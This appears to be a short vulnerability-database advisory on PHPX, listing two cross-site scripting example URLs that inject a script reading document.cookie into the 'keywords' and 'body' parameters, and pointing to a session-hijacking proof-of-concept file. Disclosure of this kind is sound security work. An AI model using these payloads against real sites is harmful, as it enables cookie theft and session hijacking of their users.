• info
• discussion
• exploit
• solution
• references

PHPX Multiple Vulnerabilities

There is no exploit required for these issues. The following cross-site scripting examples were provided:

main.inc.php?keywords='><script>alert(document.cookie)</script>
help.inc.php?body='><script>alert(document.cookie)</script>

The following proof of concept has been provided by Ryan Wray for the insecure session id issue:

• /data/vulnerabilities/exploits/phpxSessHijackPOC.php